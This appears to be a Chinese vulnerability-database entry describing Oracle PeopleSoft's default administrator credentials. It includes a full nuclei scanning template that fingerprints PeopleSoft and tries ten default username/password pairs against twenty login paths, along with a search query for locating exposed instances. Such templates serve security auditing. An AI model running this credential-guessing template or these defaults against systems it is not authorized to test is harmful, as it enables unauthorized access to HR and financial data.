漏洞信息
漏洞名称: Oracle PeopleSoft 默认登录漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: Oracle PeopleSoft是企业级的人力资源管理和财务管理系统,广泛应用于全球各大企业和组织,提供全面的业务解决方案。该系统因其功能强大和灵活性高而受到许多大型企业的青睐。
该漏洞属于默认登录凭证问题,具体表现为系统内置了多个默认的管理员账户和密码,如PS/PS、VP1/VP1等。这些默认凭证未在安装后强制修改,导致攻击者可以利用这些凭证轻易登录系统。技术根源在于系统设计和部署时未遵循最小权限原则,未强制要求更改默认凭证,从而留下了安全隐患。
此漏洞的安全风险极高,攻击者无需任何认证即可利用这些默认凭证登录系统,进而访问敏感信息、修改数据或执行未授权操作。由于PeopleSoft系统通常处理核心业务数据,此类漏洞可能导致企业面临数据泄露、财务损失或业务中断等严重后果。此外,由于漏洞利用简单,攻击者可以自动化工具大规模扫描并攻击存在此问题的系统,增加了被利用的风险。
产品厂商: Oracle
产品名称: PeopleSoft Enterprise PeopleTools
影响版本: *
搜索语法: title:”Oracle PeopleSoft Sign-in”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Foracle%2Fpeoplesoft-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
|
id: peoplesoft-default-login
info:
name: Oracle PeopleSoft - Default Login
author: LogicalHunter
severity: high
description: Oracle PeopleSoft contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.oracle.com/applications/peoplesoft/
- https://erpscan.io/press-center/blog/peoplesoft-default-accounts/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 201
shodan-query: title:"Oracle PeopleSoft Sign-in"
product: peoplesoft_enterprise_peopletools
vendor: oracle
tags: default-login,peoplesoft,oracle,fuzz
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: word
words:
- "PeopleSoft"
- "Oracle"
condition: or
internal: true
- method: POST
- method: POST
path:
- "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG"
body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG"
headers:
Content-Type: application/x-www-form-urlencoded
attack: pitchfork
payloads:
username:
- PS
- VP1
- PSADMIN
- PSEM
- PSHC
- PSCR
- HFG
- PSPY
- HHR_JPM
- HHR_CMP
password:
- PS
- VP1
- PSADMIN
- PSEM
- PSHC
- PSCR
- HFG
- PSPY
- HHR_JPM
- HHR_CMP
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: PS_TOKEN='
- type: status
status:
- 302
|